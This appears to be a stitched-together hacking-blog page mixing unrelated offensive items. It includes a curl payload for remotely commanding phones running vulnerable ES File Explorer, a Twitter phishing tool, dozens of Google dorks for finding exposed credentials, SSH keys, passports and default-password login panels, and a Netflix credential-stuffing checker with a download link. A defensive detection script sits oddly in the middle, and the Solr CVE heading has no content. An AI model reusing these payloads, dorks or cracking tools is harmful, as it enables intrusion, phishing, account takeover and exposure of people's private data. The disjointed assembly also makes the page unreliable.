Exploit Lab
Ethical hacking
Exploiting #CVE-2019-0192 Apache Solr RCE (via jmx.serviceUrl)
More info about the exploit will be shared soon.
ES File Explorer (File Manager) is a full-featured file (Images, Music, Movies, Documents, app) manager for both local and networked use! With over 500 million users worldwide, ES File Explorer (File Manager) helps manage your android phone and files efficiently and effectively and share files without data cost.

Every time a user launches the app, an HTTP server is started. This server opens port 59777 locally:

angler:/ # netstat -ap | grep com.estrongs
tcp6 0 0 :::59777 :::* LISTEN 5696/com.estrongs.android.pop

On this port, an attacker can send a JSON payload to the target:

curl --header "Content-Type: application/json" --request POST --data '{"command":"[my_awesome_cmd]"}' http://192.168.0.8:59777

These commands allow an attacker connected to the same local network as the victim to obtain a lot of juicy information (device info, installed apps, ...) about the victim's phone, remotely get a file from the victim's phone, and remotely launch an app on the victim's phone.

Affected Versions
4.1.9.7.4 and below
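
A defender-side check for the exposure described above, as an added example that is not part of the original post: it parses `netstat -ap` output for the ES File Explorer listener bound to all interfaces on port 59777 and compares an installed version string against the affected range. The function names, every sample netstat line other than the one quoted from the post, and the version strings tried are constructed for illustration.

```python
import re

ES_PACKAGE = "com.estrongs.android.pop"  # process name from the netstat line above
ES_PORT = 59777                          # port named in the post
LAST_AFFECTED = (4, 1, 9, 7, 4)          # "4.1.9.7.4 and below"

# Constructed sample: only the first tcp6 line is quoted from the post.
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program Name
tcp6 0 0 :::59777 :::* LISTEN 5696/com.estrongs.android.pop
tcp 0 0 127.0.0.1:5037 0.0.0.0:* LISTEN 812/adbd
tcp6 0 0 ::ffff:192.168.0.8:59777 ::ffff:192.168.0.23:41822 ESTABLISHED 5696/com.estrongs.android.pop
tcp 0 0 127.0.0.1:59777 0.0.0.0:* LISTEN 6001/com.example.other
"""


def parse_listeners(netstat_text):
    """Yield (address, port, pid, program) for every TCP socket in LISTEN state."""
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) < 7 or not fields[0].startswith("tcp") or fields[5] != "LISTEN":
            continue  # header lines, non-TCP sockets, established connections
        addr, _, port = fields[3].rpartition(":")   # ":::59777" -> ("::", "59777")
        pid, _, program = fields[6].partition("/")
        if port.isdigit():
            yield addr, int(port), pid, program


def exposed_es_listeners(netstat_text):
    """Listeners owned by the app on its port and bound to all interfaces (LAN-reachable)."""
    wildcard = {"::", "0.0.0.0", "*"}
    return [(addr, port, pid)
            for addr, port, pid, program in parse_listeners(netstat_text)
            if program == ES_PACKAGE and port == ES_PORT and addr in wildcard]


def is_affected(version_name):
    """True if a dotted version string is at or below the last affected release."""
    parts = tuple(int(n) for n in re.findall(r"\d+", version_name))
    return bool(parts) and parts <= LAST_AFFECTED


if __name__ == "__main__":
    for addr, port, pid in exposed_es_listeners(SAMPLE_NETSTAT):
        print(f"pid {pid} listens on {addr}:{port}, reachable from the local network")
    for v in ("4.1.9.7.4", "4.1.9.7", "4.1.9.8"):  # constructed version strings
        print(v, "affected" if is_affected(v) else "not in the affected range")
```
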

PoT - Phishing On Twitter

How does it work?
1- Collect data from the target's Twitter account
2- Find the target's friend and copy his/her account
3- Generate a tweet automatically with a Markov chain algorithm and send it

Download URL: https://github.com/omergunal/PoT
++ All sorts of Websites (a lot of colleges) ++
intitle:"index of /" ssh

Data you find:
- Webserver Version
- SSH Version
- SSH Keys
- SSH Logins
- SSH .exe files

I found a lot of servers using < SSH 1.4.*
These are usually +5 years old and full of security holes.
A search in Exploit DB for SSH 1. turns up +40.000 exploits for these;
some may work.

++ 55 500 results at the time of writing ++


DISCLAIMER:
The vulnerabilities are suggestions; none of them have been tested by me.
Always request permission before testing anything on someone else's system.

Dork for finding private directories inside the WordPress popup plugin, including admin data, which are present in WordPress websites.

Note: To access more sensitive files, navigate to the parent directory until /admin or /conf etc.

Dork : allinurl:"wp-content/plugins/wordpress-popup/views/admin/"

Also Try : allinurl:"wp-content/plugins/wordpress-popup/"

Dork about webcam and IP camera servers for Windows

intitle:"webcam 7" inurl:'/gallery.html'



Credentials in Windows folder

intitle:"index of" "Application Data/Microsoft/Credentials"
Useful dorks

intitle:"index of" inurl:documents backup
intitle:"index of" users.csv | credentials.csv | accounts.csv
Dork about login panels of Xfinity Routers
intitle:"Login - Xfinity" AND "Gateway > Login"

Windows trash bins with a lot of juicy info.
You can also get drive letters and folders by attaching :%5C/ before $Recycle.bin (%5C is "\").
intitle:"index of" $Recycle.bin

intitle:"index of" "/Windows/Recent" | "/Windows/History/"
This will give you the most recently used files and the history data.
This is for Vista - Windows 10; it will not work against XP or Windows 2003.


inurl:"/.Trash" intitle:"index of" ~

inurl:"/cgi-bin/WS_FTP.LOG"

inurl:login.htm "access" database
intitle:"Log in - WhatsUp Gold"

Description: This Google dork can expose the landing login page for
the WhatsUp Gold network monitoring tool.
Here's the published CVE link for WhatsUp Gold:
https://www.cvedetails.com/vulnerability-list/vendor_id-193/product_id-3865/Ipswitch-Whatsup-Gold.html

Google dork description: Sites running WordPress CMS and access to the
wp-json API endpoint which might be vulnerable to content injection
Google Search: inurl:"/wp-json/" -wordpress

intitle:Login inurl:login.php intext:admin/admin
This Google Dork discovers login portals with weak default passwords.

intitle:"Index of /" inurl:passport
Find a lot of passports
🔥 Netflix Proxyless Checker 🔥

Highly Requested 🔥

Connect to USA IP in VPN

Load Combos and Set Threads to 5 and Enjoy Hits

Link to Download : https://www.file-up.org/q211kr9wu83u